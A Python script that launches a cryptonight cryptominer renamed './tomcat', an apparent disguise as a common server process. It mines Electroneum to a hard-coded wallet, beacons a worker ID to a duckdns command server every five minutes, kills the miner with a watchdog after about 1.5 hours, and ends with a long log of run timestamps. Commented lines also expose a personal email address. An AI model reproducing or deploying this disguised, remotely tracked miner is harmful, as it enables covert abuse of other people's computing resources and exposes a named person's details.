import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:51:06.037566
#2018-02-17 16:38:04.125450
#2018-02-17 18:26:07.336876
#2018-02-17 20:14:04.070879
#2018-02-17 22:02:01.961364
#2018-02-17 23:45:08.733554
#2018-02-18 01:36:06.296128
#2018-02-18 03:23:01.807874
#2018-02-18 05:10:07.260941
#2018-02-18 07:02:04.904145
#2018-02-18 08:50:06.347964
#2018-02-18 10:36:06.398910
#2018-02-18 12:21:03.447029
#2018-02-18 14:08:05.321059
#2018-02-18 15:58:05.482043
#2018-02-18 17:48:01.310185
#2018-02-18 19:35:06.822985
#2018-02-18 21:20:02.242445
#2018-02-18 23:08:03.575434
#2018-02-19 00:55:07.982537
#2018-02-19 02:42:07.028877
#2018-02-19 04:29:05.877251
#2018-02-19 06:14:06.948669
#2018-02-19 08:02:08.423189
#2018-02-19 09:52:05.099622
#2018-02-19 11:41:07.185125
#2018-02-19 13:27:07.607198
#2018-02-19 15:16:02.125182
#2018-02-19 17:03:07.849459
#2018-02-19 18:49:08.302096
#2018-02-19 20:39:04.242234
#2018-02-19 22:25:08.191663
#2018-02-20 00:11:01.998076
#2018-02-20 01:57:03.529986
#2018-02-20 03:47:01.582221
#2018-02-20 05:32:06.383568
#2018-02-20 07:16:05.639558
#2018-02-20 09:03:01.386300
#2018-02-20 10:45:10.023930
#2018-02-20 12:33:06.561508
#2018-02-20 14:18:08.929580
#2018-02-20 16:03:06.426586
#2018-02-20 17:48:09.184311
#2018-02-20 19:39:10.174379
#2018-02-20 21:27:08.249010
#2018-02-20 23:10:03.864682
#2018-02-21 00:55:06.487448
#2018-02-21 02:41:02.109154
#2018-02-21 04:28:06.976397
#2018-02-21 06:17:05.538744
#2018-02-21 08:02:08.008997
#2018-02-21 09:50:07.239402
#2018-02-21 11:38:07.906299
#2018-02-21 13:27:05.874113
#2018-02-21 15:11:01.658623
#2018-02-21 17:01:08.912492
#2018-02-21 18:50:11.070820
#2018-02-21 20:37:08.219251
#2018-02-21 22:30:09.751071
#2018-02-22 00:20:04.065479
#2018-02-22 02:08:06.945254
#2018-02-22 03:55:08.541838
#2018-02-22 05:42:06.738456
#2018-02-22 07:27:07.526882
#2018-02-22 09:16:05.493560
#2018-02-22 11:03:09.217014
#2018-02-22 12:49:09.352710
#2018-02-22 14:37:06.995000
#2018-02-22 16:24:06.673812
#2018-02-22 18:11:10.235685
#2018-02-22 20:01:08.327042
#2018-02-22 21:50:04.436427
#2018-02-22 23:37:03.753090
#2018-02-23 01:24:07.407185
#2018-02-23 03:11:02.076930
#2018-02-23 04:57:07.330400
#2018-02-23 06:43:06.518703
#2018-02-23 08:33:03.965363
#2018-02-23 10:46:08.143078
#2018-02-23 12:42:05.303020
#2018-02-23 14:25:09.968211
#2018-02-23 16:16:01.760842
#2018-02-23 18:03:06.438341
#2018-02-23 19:48:01.778667
#2018-02-23 21:32:02.104516
#2018-02-23 23:19:06.192019
#2018-02-24 01:11:05.013521
#2018-02-24 03:03:04.014717
#2018-02-24 04:49:04.896287
#2018-02-24 06:34:04.722580
#2018-02-24 08:22:07.336124
#2018-02-24 10:05:08.656407
#2018-02-24 12:02:06.273714
#2018-02-24 13:49:07.022127
#2018-02-24 15:40:01.557250
#2018-02-24 17:34:03.881933
#2018-02-24 19:20:03.729346
#2018-02-24 21:11:06.525688
#2018-02-24 23:45:03.258748
#2018-02-25 03:48:05.624339
#2018-02-25 06:35:07.830875
#2018-02-25 11:36:05.268732
#2018-02-25 13:33:01.942125
#2018-02-25 15:07:01.717876